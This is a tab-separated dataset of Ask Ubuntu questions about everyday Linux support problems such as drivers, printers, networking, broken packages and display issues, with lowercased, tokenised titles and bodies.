441258	running apps from sdk on nexus 4	i wanted to play around with ubuntu touch , so i installed the ubuntu sdk 2.8.1 and dual-booted my nexus 4 with ubuntu and android . but when i connect my nexus to the sdk , i can start an ssh session ( with ctrl + f10 ) , but i can not run an app on my device ( using ctrl + f12 ) . i get the following error message : bash : can not set terminal process group ( -1 ) : invalid argument . bash : no job control in this shell i also get about ten messages everytime i want to run , saying : warning : permanently added ' [ 127.0.0.1 ] :2222 ' ( rsa ) to the list of known hosts . i am totally new to all this phone sdk stuff , so if i have n't given enough info , please let me know .
441259	fan control with 13.10 and asus p8z77-v deluxe motherboard	my supposed quite pc is quiet audible presently . i have three silent wings 2 fans connected to the asus p8z77-v deluxe motherboard and a dark rock 2 cpu cooler with fan all working nicely and connected to the motherboard keeping temperatures very reasonable but they are spinning too fast and creating a sound i should n't be getting as they whirl around . the bios has the fan settings set to 'silent ' mode and in windows they are , but in ubuntu they run too fast . i have been along the lm-sensors and pwmconfig route , as suggested in other posts here and elsewhere but pwmconfig comes back with the message , /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed . i am uncertain how to resolve . how can i turn down the fans ? is it worth investing in an inexpensive pci fan control that is compatible with linux ?
441262	thinkpad w540 specific keys ( f1-f12 )	does anyone know how i can get the keys specific to the thinkpad w540 keyboard working on ubuntu ? i 'm thinking of keys such as those increasing or decreasing screen brightness ; displaying all open windows ; searching etc . these keys cover f1 to f12 on the keyboard . thank you .
441263	rename new files as the old ones	i have a large music collection , and a good number of playlists that i have formed over the years . all the music is neatly organised in a folder hierarchy . i have managed to get my hands on higher quality versions of multiple albums , and would like to replace the low quality ones with these . but , that would mean that i have to build my playlists again from the scratch , as the new filenames will not be recognise in the old playlists . what is the best option for me to proceed ? one of the ways i thought would work was to see which filename of in new album is closest to the old one , and then rename it with the old filename ( i.e . file named 01-highway-to-hell.mp3 in new album would be closest to highway_to_hell.mp3 in the old album ) . how do go about doing this renaming ?
441266	where do i download ubuntu touch from ?	i 'm interested in ubuntu touch , but i ca n't figure out how to download it . where can i download it from ?
441270	how to access over wlan usb external hard disks connected to my ubuntu desktop from my laptop or android tablet ?	i have lots of music stored on a usb external hd connected to my ubuntu desktop . i wish to play them remotely over wlan with my laptop or my android device . i can see them on the network but access is always denied for lack of 'permission ' altough i have activated all possible share options and applied all imaginable permissions . none of the solutions i have found on ask ubuntu have worked for me - or i was unable to implement/understand them ... thanks , dm./ .
441274	how to add humble bundle packages to account without installing	i purchased the humble indie bundles 5 and 6 , both of which offer `` click the button below to redeem your bundle on the ubuntu software center . '' sure enough , if i click through and log in to ubuntu one , i can install the individual games . when i install a game , it becomes associated with my account and i can find it in my `` reinstall previous purchases '' list in ubuntu software center . i 'd like to associate all of the games with my account , but not bother downloading them now . i want to treat it like my steam account , where i might install it months ( or cough years ) after i 've purchased it , and have a single convenient place to install them from . ( i would n't be bothering with this at all , but some of the games are n't available for linux through steam . ) is there an easy way to do this ? so far all i 've found is to start the install , then cancel it , which seems needlessly complex . ( unrelatedly , i saw a number of humble bundle questions here while i searched for answers . a humble-bundle tag might be useful . i lack the reputation to create it . )
441279	illegal short term buffer state detected	when i use videocapture of opencv , it returns this message : [ h264 @ 0x11055a0 ] illegal short term buffer state detected . but the code seems to work fine and have the correct result . could anyone tell me what is wrong with my codes ? # include < sys/types.h > # include < dirent.h > # include `` opencv2/opencv.hpp '' # include < string > # include < vector > # include < iostream > # include < algorithm > # include < sstream > using namespace cv ; using namespace std ; int main ( int argc , char *argv [ ] ) { videocapture cap ( `` ./img/tr0009.mp4 '' ) ; if ( ! cap.isopened ( ) ) { cout < < `` error . `` < < endl ; return -1 ; } double dwidth = cap.get ( cv_cap_prop_frame_width ) ; double dheight = cap.get ( cv_cap_prop_frame_height ) ; double frames_num = cap.get ( cv_cap_prop_frame_count ) ; }
441280	what is the best video communicator for ubuntu ?	which video calls client do you think is the best , and has compatibility for ubuntu and windows 8 ?
441281	increase unity dash opacity in ubuntu 13.10	is it possible to set opacity=100 ( no transparency ) for the unity dash ( search ) ? i am not talking about blur effect . when i set no blur then the unity dash looks fully transparent . to reduce the load i want to disable the blur effect as well as set the opacity to 100 . i am using ubuntu 13.10 64bit .
441284	optirun problem	i can not run 'glxspheres ' . here is the result for optirun glxspheres : [ 54.811157 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) problem parsing the config file [ 54.811195 ] [ error ] aborting because fallback start is disabled . result for glxinfo : xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . this is the content of /etc/bumblebee/bumblebee.conf : # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver= # # client options . will take effect on the next optirun executed . [ optirun ] # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia module=nvidia pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-current : /usr/lib32/nvidia-current # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-current/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau the problem started when steam suggested i should install nvidia-331 . i did and now nothing works . i found that a number of people had issues with bumblebee . i tried implementing some solutions i saw but nothing has worked so far . if anyone can tell me how to fix this problem i would be most thankful .
441288	setup brother mfc-465cn multifunction center : cups server error	i am absolutely new to ubuntu ( and linux ) and trying to set up a brother mfc-465cn multifunction center . i went through the process of setting up the printer and used the recommended generic driver . when i tried to print a test page i got the following error : there was an error during the cups operation : 'client-error-document-format-not-supported ' . can anyone assist with this ? thanks !
441289	i need the `` unique id '' to finiah pairing my apple magic trackpad to 13.10	using the bluetooth gui in 13.10 is failing due to ubuntu asking for a paring pin with my magic trackpad - since trackpads are not keyboards it fails . i found this guide to use hcitool to pair which almost gets me paired : https : //wiki.ubuntu.com/multitouch/applemagictrackpad i am stuck however at the part where is tell me to create /lib/bluetooth//pincodes . the pincodes file is asking for a section and you are supposed to be able to find it with the output from lsinput ... but my device is not listed with the output ( but i do see a keyboard i added recently there with it 's unique id as part of the output ) so basically i just need a way to discover my magic trackpad 's unique id so i can add the 0000 pincode . any ideas ?
441290	viewing ip address table of a belkin router	i have two computers , each with their own respective internal ip address e.g . 192.168.x.xx . now i also have a belkin router which serves as the gateway , which is at ip address 192.168.2.1 : $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.2.1 0.0.0.0 ug 0 0 0 eth0 i can engage the firmware in the router via an http connection to http : //192.168.2.1/ . i am wondering is there a way within the terminal to view the ip address table of the router that does the actual mapping of ip addresses to individual computers . maybe i want to change one of the internal ip addresses , make it static , etc . can this be accomplished within the terminal ?
441291	external display is being overlapped by laptop display . blue edges	i seem to be having difficulty setting ubuntu up to run on an external monitor for use as a htpc/xbmc box . no matter what settings i apply i am unable to have the laptop display remain in a position that is not directly overlapping my external display.when it overlaps the desktop quite literally moves and the sides and top when moved towards them have blue bars . even when the laptop screen is disabled within nvidia 's server settings the overlap glitch still occurs . is there anyway to completely disable the laptops display , such that ubuntu does not even know it is present ? any other solutions to this problem ? the laptop monitor is not used with this setup . i do have under-scanning enabled within the nvidia control screen . it happens after i enter a program the changes the resolution like xbmc . please note this screen shot is taken from the external display , the laptop monitor was disabled .
441295	why ca n't my computer recover from suspend	i 've had my computer set to black screen on lid close for half of my linux career . in some distro 's it 's worked and in others it has n't . in the latest release series of linux mint and ubuntu it 's been black screen of deathing , and i ca n't switch over to a tty or anything . is there a way i can debug/fix this problem ? i feel incredibly n00bish . any thing i can do . 95 % sure this a duplicate .
441296	samba clients set up	ok , i 've learned how to use nano to edit smb.conf file with some limited success . how do i set up each client machine to use samba ? does the workgroup definition in the config file refer to the same networking workgroup of my windows machines ? i 'm running 12.04lts by the way . i need the baby steps if you please .
441297	where can i go to get a description of the many services that are avaialbe ?	my subject line pretty much says it all . i 'm struggling as a newbie but am making progress .
441298	print queue problems	i am an absolute beginner with ubuntu and i appear to have a long queue of documents in my canon pixma ip2400 . i have tried to print but noting happens ... .. i have tried all the command options that i can find on this site and the web to clear the print queue but nothing works.the system recognises the printer and i have set it as default have tried uninstalling the printer and reinstalling it again . any ideas ? ? ?
441300	swap partition not working on ver 13.10	it 's a 3 day old install of ubuntu 13.10 i set my partitions up correctly beforehand with gparted ( you 'll have to trust me on that ) swap partition was formatted as linux-swap and given 6gb of space . my ram is 6gb also . in gparted now my swap partition 's file system is 'unknown ' and there is an exclamation mark after the '/dev/sda6 ' . immediately after installing ubuntu , while booting , i would get the message that there was a problem with '/dev/mapper/cryptswap1 ' not being ready to mount or not being available . i followed this very short tutorial , essentially creating a new swap and reformatting . after this i no longer get the error message while booting , but my swap partition still does n't appear to be working according to gparted . any help much appreciated . /dev/sda5 is root /dev/sda6 is swap /dev/sda7 is home output of mount : /dev/sda5 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) /dev/sda7 on /home type ext4 ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) /home/yerman/.private on /home/yerman type ecryptfs ( ecryptfs_check_dev_ruid , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs , ecryptfs_sig=cbb0ed41b9f457c5 , ecryptfs_fnek_sig=9e985b7d47d6e940 ) gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=yerman ) gvfsd-fuse on /root/.gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev ) output of free -h : total used free shared buffers cached mem : 5.5g 3.4g 2.1g 0b 164m 2.4g -/+ buffers/cache : 842m 4.7g swap : 5.9g 0b 5.9g output of swapon -s : filename type size used priority /dev/mapper/cryptswap1 partition 6143996 0 -1
441301	monitor wo n't stay on if i close the lid	i am using ubuntu 14.04 . i ca n't get the external monitor to stay on if i close my laptop 's lid . i have been using ubuntu since 12.04 and i have always had the same problem . can anyone help ? thx .
441305	how do i hide a running application from tint2 in fluxbox ?	here 's the situation : i have eterm automatically start when fluxbox starts . eterm sits on the desktop layer ( layer 12 ) , it has transparency , no window decoration , etc . i have everything set up exactly how i want it except that it shows up on tint2 's task bar as a running app . i know that if i was running openbox , i could use `` skip_taskbar '' in rc.xml , however , i prefer fluxbox and i can not find any solution . i have used fluxbox 's [ hidden ] and [ iconhidden ] settings , but neither will work with tint2 . here 's the question : how do i keep eterm from appearing as a running task on tint2 's task bar while running fluxbox as my wm ? screenshot of issue :
441312	issue with installing ubuntu on asus n56dp-dh11	i 'm new to linux and just tried installing ubuntu on my laptop . after installing it needs a reboot which leads me into this error message `` the system is running in low-graphics mode your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . '' i 've fiddled around with this for about 12 hours now and i have yet to make progress . i 've looked online and tried just about every solution i could find . again my computer is an asus n56dp-dh11 with an amd a10 and an amd radeon hd 7730m . i also swapped out the hard drive for a solid state when i bought it if this would change anything . any help will be greatly appreciated , thanks !
441316	ubuntu does not display on my laptop 's screen , but does display when connected to tv	i installed ubuntu 13:10 using the windows executable through wubi.exe . the image of the os does not appear on my laptop screen , but when i connect it to a tv via an hdmi cable the image appears normally ! specs : ⠀lenovo g400s notebook ⠀core i3 l3 cache 2.4 ghz ⠀4gb ram ⠀500gb hard drive ⠀lcd 14 ''
441318	opengl ( 2.1 or greater ) on oracle virtualbox ?	i need to run the corona sdk , but i 'm running ubuntu ( 13.10 ) , so i installed the w8 as guest on the virtualbox . i am struggling to make it work , because the corona sdk states the following when i run it : this machine does not meet the corona simulator 's minimum video hardware requirements . minimum opengl version required : 2.1 your machine 's opengl version : 1.1.0 i tried to upgrade the video card 's drivers , but i ca n't find the right drivers . the windows ' device manager shows that it has a `` virtualbox graphics adapter for windows 8 '' , and i actually have a nvidia geforce 740m ( notebook ) installed . is there a way to make my corona sdk run ?
441321	unable to boot up due to driver issues	i 've been having an issue booting up for a while . when i turn on my computer , i get this and i cant really do anything beyond that . i 've tried reinstalling ubuntu and and that worked but after doing a restart , i get back to this screen and i ca n't boot up . i 'm fairly certain that this is caused by a driver update i did . i tried to install a driver update from a github repo that was recommended in a lot of askubuntu posts . the driver in question is rtl8192ce , a reatek wifi driver . i think that this is the cause because the output on that screenshot mentions that driver name a bunch of times . any ideas what i could to to fix this ? i 've already tried the reinstalling ubuntu , recovering from an old version via the grub menu and nothing seemed to work . thanks for your help !
441322	unable to install and update software beside of having internet connection	i am updating packages on my ubuntuusing the sudo apt-get update command but the updation every single time does n't exceed 23 % . please help me as i am new to ubuntu12.04
441327	kdeconnect for ubuntu	is there an app in ubuntu that provides the same integration with android phones as kdeconnect ? now that kde is a framework it might n't have the same impact of installing libs into my ubuntu install as it used.to but if there was something designed that would be better .
441329	desktop sharing stopped working on ubuntu 12.04	does anyone know how can i make vino-server to start running again via an ssh-shell command ? i 've been using remote desktop with no issues up until today when i lost connection to the server and had to make someone to switch that computer off ( power button because it has no screen ) . when it was turned back on i could open an ssh session but not a remote desktop session . by executing ps aux | grep `` vino '' i found out vino-server is not running and ca n't make it to run via an ssh command line ( i 'm far away from that server ) , neither rebooting does the trick . dbus-launch -- exit-with-session gsettings list-recursively org.gnome.vino reports org.gnome.vino alternative-port uint16 5900 org.gnome.vino authentication-methods [ 'vnc ' ] org.gnome.vino disable-background false org.gnome.vino disable-xdamage false org.gnome.vino enabled true org.gnome.vino icon-visibility 'client' org.gnome.vino lock-screen-on-disconnect false org.gnome.vino mailto '' org.gnome.vino network-interface '' org.gnome.vino notify-on-connect true org.gnome.vino prompt-enabled false org.gnome.vino require-encryption false org.gnome.vino use-alternative-port false org.gnome.vino use-upnp false org.gnome.vino view-only false i already tried all the suggested solutions i could find , neither works .
441331	deluge permission denied mounted drive	i 've got deluge running on a vm with ubuntu server 12.04 lts . i 've set up nfs so the share /allspark/downloads is mounted under /media/vm-seedbox . i 've set permissions to /media/vm-seedbox to be 775 , owned by the user vm-seedbox and part of the smbshare group . this group is also on the server , and /allspark/downloads is part of this group . vm-seedbox is also a part of the smbshare group . the gid matches both on the server and client . i keep getting permission denied when trying to download a torrent to /media/vm-seedbox under the user vm-seedbox which is the only user account on the machine . if i create a new file from the client in /media/vm-seedbox i only have 664 permissions which is strange too , i would have expected it to be 775 since i 'm part of the smbusers group unless i 'm understanding permissions wrong ?
441332	ubuntu server remote access ?	hi i 'm pretty new to the use of ubuntu server . i had a spare computer laying around and i figured i 'd make it into a storage device . i have been able to get the server to work on my home network but have had a lot of issues acessing it outside of it . all the forums i went on already talk about port forwarding and stuff and i 've already done that . i 'm using samba as the ftp software and have no idea where to go from here . the static ip address that i assigned the server is 192.168.1.200 and its being forwarded for all ports 20-22 on the router side . any help would be greatly appreciated . i '' m not even sure how to find my external ip if thats a thing
441333	cant get past the try or install screen	i get to the try or install screen then all goes black . here are some images hope this helps . i dont know if i took the right pics but hope this helps . i am using an hp touchsmart notebook pc 4gb ram 500gb hd 64bit win 8 amd a6-5200 with radeon hd graphics . i am also trying to install from a cd 13.10 . i got the same results with 12.04.4
441334	google chrome vanished from applications launcher	i just installed ubuntu yesterday , after using windows exclusively since 1995 . today i downloaded google chrome because that 's my favorite web browser . i followed the directions at how to launch a newly installed program to launch chrome and lock it to the launcher . unfortunately ... after closing my laptop for an hour , i 've come back to find chrome is no longer locked to the launcher and i can not launch chrome at all , not even from dash . what must i do to make chrome permanently show up on the launcher , and get it working again ?
441336	facebook videocalls in firefox	i use ubuntu 13.10 32 bits and firefox 28 , i 'd want to know if there is any way to do videocalls in facebook . thanks .
441337	i need help installing a canon mp620 printer	i am having problems installing my canon mp620 wireless printer . the system sees the printer but when i try to print a test page it only adds to the print cue without completing the task .
441339	is there any gui for elf file ( probably using readelf ) ?	looking for a good gui for reading elf files . i know about readelf which is only command line
441340	what is wrong with my network configuration ?	this is what i have in /etc/network/interfaces auto eth0 iface eth0 inet static address 192.168.1.34 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.1.255 gateway 192.168.1.254 when i type /etc/init.d/networking restart it says runnig etc/init.d/networking restart is deprecated because it may not enable again some interfaces reconfiguring network interfaces ... rtnetlink answers : no such process then i do an ifconfig to see what changed and nothing changes , sometimes when i restart the network more than once and check the ifconfig i see that it erases everything but by the next restart everything is back to normal again ( without the changes that i want ) . the bcast before the change is : 192.168.1.255 and the subnet mask is /24 i did not change those .
441341	new ubuntu user : what is the repository ? how do i access it ? how do i find and use wine ?	i just started using ubuntu yesterday because windows has been nothing but headaches for nearly 20 years now . there are only a few windows-based applications i want to continue using , and it seems something called wine will probably enable me to go on using those applications . but ... all the directions i 'm finding for how to get and use wine are confusing the heck out of me . http : //www.winehq.org/download/ubuntu provides a link to download wine , but before using it the page says you first must add the winehq ppa repository . i do n't even know what that is . per the directions , i opened ubuntu software center , but i do n't see edit ... which makes following the rest of the directions impossible . please help . and please use small words , lol , because i know nothing about computer programming . i only know microsoft is evil and i 'm sick of dealing with it ...
441345	sharing files and devices between 2 linux machines	a couple of versions of ubuntu ago , ( guessing about 10.10 , no later than 12.10 ) i used to open nautilus , type in the local ip address of a linux machine on my network , and it would pop open a box asking for user name and password , ask if i want to remember these credentials . then right away i would have access to that computer 's files reading and writing . i was even able to access a cd on linux computer # 1 , and play the windows exe file using wine on linux computer # 2 . now i ca n't seem to do this on any of my recent installs . i hav n't tried this on ubuntu as i do n't currnetly like how slow unity is on medium speed hardware . so i use xubuntu 13.10 on my desktop now , and elementaryos luna is what 's on my laptop now . i do n't remember ever changing sharing options when it worked before , buts its possible i changed it and forgot or did n't know what that setting really did . i really would prefer a mostly graphical way to set this up . something that is not at all dependant on distro or version , as i enjoy trying new things that come out , or even putting in one of my old ubuntu 9.04 cds just for nostalgia reasons . ( first version i ever used , and so easy and customizable , i really miss it : ' ( ... ) i 've heard of nfs and tried it but did n't work , and was way to text file and terminal oriented for my tastes . want something rock solid that ca n't be messed up . thank you and god bless
441348	printing labels on brother p-touch	i 'm using 13.10 ( 64-bit ) , and i 'm looking for a way to print labels using my brother pt-18r , preferably from the command line , e.g. , echo `` label text '' | lpr -p ptouch i 've added the printer ( with the recommended foomatic driver ) and can adjust numerous printer settings through the native printers application , but i ca n't seem to find the appropriate settings to do what i want , and i 'm wasting a lot of tape trying ! anybody set this up before ?
441349	no sound output both speakers and headphone toshiba satellite m55 xubuntu 12.10	i am running xubuntu 12.10 and i was trying to repair the sound on the headphone jack since i had sound output through there and now i have no sound what so ever . so i think i made things worst . no sound through the speakers and no sound through the headphone . i know i did something wrong but i do n't know what i did . i have pulseaudio . if i could at least get the speakers working again i 'll be happy . any help will be highly appreciated !
441353	log viewing tool for ubuntu	i am looking for a log viewing tool in ubuntu . not just ordinary text viewing tool , i need to monitor logs in real time .
441354	ubuntu 13.10 . where is my desktop environment ?	now ( some minutes ago ) i runned qt creator to make my app for ubuntu . when i was starting my computer lagged . after 1-2 minutes i opened dash ( i 'm using default unity de ) to find charmap . when i was typing unity panel hanged , and my de closed . no taskbars , no panels , only fullscreen qt creator and terminal , what was closed only by command exit . after reboot the main ubuntu loading logo sets to very big size ( i think it was 800x600 , my screen 's default is 1366x768 ) . after this login screen was shown , without button to change de . when i logged in , the black desktop without icons was shown , only black color on my screen ( cursor was shown , but i could n't move it ) . and in few minutes window was shown ( without control panel ) on left-top with text `` system error '' and two buttons ok and cancel . what do i do ? how to fix it ?
441355	installing ubuntu with windows 8..free space problem	i have windows 8 and i have disable fast boot and secure boot from the uefi and from inside windows 8 . i have 3 primary partitions in windows and i did some shrinking on one of them and made a 50 gb free space . i wanted to install ubuntu 12.04 on this , but when i get to the install part , it does not show any free space available at all . this is weird . does this have anything to do with 3 primary partitions ? thank you ( i am a linux noob )
441360	will i be able to get an interface that is like gnome classic in ubuntu 14.04 ?	for a while i departed from ubuntu to use linux mint because i really do n't like unity , or gnome 3 's most recent interface . i was fine with what was called `` gnome classic '' , but i feared it was being neglected because there were some significant bugs that lingered without improvement for a while . unfortunately , while i like the mate interface in linux mint , mint itself lacks the level of community support that ubuntu has . mint has development and support issues . not to disparage their efforts , i think they 've done great work , but it 's tough making a ui , and unfortunately it 's just not working for me . i 'm thinking of returning to ubuntu with the 14.04 release , but not if it means using unity . i have looked into the current situation , and i 'm a little confused about the terms being thrown around . i have seen referens to `` fallback '' , `` flashback '' , and `` classic '' , without any clear idea of which is available and what they offer . is there still an option to get an interface that resembles the way gnome used to look ? can i get an interface that looks like what i have with mint , but with the support and features of ubuntu ? can i get something close to that ?
441361	broken package , unable to install anything . !	i know there is so many solution for this but i tried all those none of them are working . when i tried apt-get install -f ... siddharth @ sid-hp-dv6 : ~ $ sudo apt-get -f install [ sudo ] password for siddharth : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libgcc1 the following new packages will be installed : libgcc1 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/43.4 kb of archives . after this operation , 130 kb of additional disk space will be used . do you want to continue [ y/n ] ? y e : can not get debconf version . is debconf installed ? debconf : apt-extracttemplates failed : no such file or directory dpkg : regarding ... /libgcc1_1 % 3a4.8.1-10ubuntu9_amd64.deb containing libgcc1 : amd64 , pre-dependency problem : libgcc1 pre-depends on multiarch-support multiarch-support is unpacked , but has never been configured . dpkg : error processing /var/cache/apt/archives/libgcc1_1 % 3a4.8.1-10ubuntu9_amd64.deb ( -- unpack ) : pre-dependency problem - not installing libgcc1 : amd64 errors were encountered while processing : /var/cache/apt/archives/libgcc1_1 % 3a4.8.1-10ubuntu9_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) also tried sudo apt-get update sudo apt-get autoclean sudo apt-get clean sudo apt-get autoremove sudo dpkg -- remove -force -- force-remove-reinstreq package name i am unable to install anything , there is a red error icon came on status bar..showing an error occurred , please run package mangaer ... ... now please guide me , what should i do ? ? ? ? ? ? ? ? ? ? ? ? ? here is output when i tried sudo apt-get install -- reinstall debconf reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : debconf : predepends : perl-base ( > = 5.6.1-4 ) but it is not going to be installed recommends : apt-utils ( > = 0.5.1 ) but it is not going to be installed recommends : debconf-i18n but it is not going to be installed libc6 : depends : libgcc1 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . also tried https : //help.ubuntu.com/community/packagemanagertroubleshootingprocedure it helped me for 5 mins only then problem came again ...
441362	blank screen on boot with hdmi tv	i just bought a new notebook hp compaq cq58-d69sg notebook 15.6 ( details below ) . and installed ubuntu 12.04 when i connect it to my tv with hdmi when it is already booted the screen apears , and seems fine , except that the tv gets recognized as 32 '' , although it is a 42 '' but when i want to boot while the hdmi is connected i only see a blank screen . ( not even `` press esc to bios ) , and the tv seems to feel an input , because it switches to hdmi 720p . the funny thing is that i tried it with a different tv ( however more like a monitor ) everything worked fine ... i have searched a lot in the internet , but did nor find a solution . there were a few posts about repository drivers wich i have not tried yet , because i am not sure if its good ... i hope somebody can help me solve this issue tv : panasonic viera 42 '' notebook : intel® core™ i5-3230m ( 2x 2.6 ghz ) arbeitsspeicher 4 gb speichertyp ddr3-ram grafikkarte intel® hd 4000 grafikkarten-serie intel® hd graphics notbook info on ubuntu : speicher : 3,8 gib processor : intel® core™ i5-3230m cpu @ 2.60ghz × 4 grafics : intel® ivybridge mobile system : 64 bit driver info : intel® ivybridge mobile standard
441367	bad package installed , ca n't uninstall , ca n't use software center or command-line install	trying to open software center from command line gives this error : systemerror : e : the package hl1470nlpr : i386 needs to be reinstalled , but i ca n't find an archive for it . 2014-03-30 22:32:35,966 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed ( there is a large call stack that goes with it . ) i have the .deb that this hl1470nlpr package was originally installed with . ( it was a mistake . ) when i try to use it to reinstall i get this : sudo dpkg -i hl1470nlpr-1.1.2-1.i386.deb ( reading database ... 219830 files and directories currently installed . ) preparing to replace hl1470nlpr 1.1.2-1 ( using hl1470nlpr-1.1.2-1.i386.deb ) ... unpacking replacement hl1470nlpr ... /var/lib/dpkg/info/hl1470nlpr.postrm : 3 : /var/lib/dpkg/info/hl1470nlpr.postrm : /etc/init.d/lpd : not found dpkg : warning : subprocess old post-removal script returned error exit status 127 dpkg : trying script from the new package instead ... /var/lib/dpkg/tmp.ci/postrm : 3 : /var/lib/dpkg/tmp.ci/postrm : /etc/init.d/lpd : not found dpkg : error processing hl1470nlpr-1.1.2-1.i386.deb ( -- install ) : subprocess new post-removal script returned error exit status 127 /var/lib/dpkg/tmp.ci/postrm : 3 : /var/lib/dpkg/tmp.ci/postrm : /etc/init.d/lpd : not found dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 127 errors were encountered while processing : hl1470nlpr-1.1.2-1.i386.deb trying to remove the package gives : sudo apt-get remove -- purge hl1470nlpr reading package lists ... done building dependency tree reading state information ... done e : the package hl1470nlpr : i386 needs to be reinstalled , but i ca n't find an archive for it . i ca n't remove the package , and ca n't install anything else . any ideas ? thanks . steve
441371	/media/ubuntu fresh install ?	so i just installed ubuntu , i set up my partition beforehand , a 150gb ext4 . when i installed ubuntu it asked me to drag a slider to set up the partition , so i left it in the middle . files getting half and ubuntu getting half . well the install went well and now i have a /media/ubuntu mount that is empty ... . is it important and can/how do i get rid of it and give the whole partition to my files and not an empty mount . i am relatively new to ubuntu so if any other info is needed please ask .
441373	transfer asterisk parameters from centos into ubuntu 12.04	please help move asterisk parameters from centos into ubuntu 12.04 . how i make it in centos : /etc/dhclient-eth0.conf reject 192.168.0.1 ; send host-name `` asterisk '' ; request subnet-mask , broadcast-address , time-offset , host-name ; /etc/sysconfig/network-scripts/route-eth0 10.0.0.0/8 via 10.2.x.1 dev eth0 /etc/sysconfig/network-scripts/ifcfg-wlan0 device= '' wlan0 '' bootproto=static hwaddr=your mac onboot=yes type=wlan ipaddr=192.168.100.6 netmask=255.255.255.0 nozeroconf=yes broadcast=192.168.100.255 network=192.168.100.0 defroute=yes nm_controlled= '' no '' name= '' wlan0 '' gateway=192.168.100.1 /etc/sysconfig/network-scripts/ifcfg-eth0 device=eth0 bootproto=dhcp onboot=yes hwaddr=your mac-address type=ethernet ipaddr= netmask= nozeroconf=yes nm_controlled= '' no '' /etc/sysconfig/network networking=yes networking_ipv6=no hostname=host.asterisk gateway=192.168.100.1 dns1=192.168.100.1 dns2=8.8.8.8
441374	launcher and some icons do not appear	this is the first time i use linux ( ubuntu - 13.10 ) after installation , there is no launcher bar and some icons , like minimize / maximize and close , are missing in any window . what i 've realized is that my graphics card is unknown ; it 's an onboard card , and my motherboard is : ga-8i865gme-775-rh . i 've tried some solutions already but do n't work . thanks
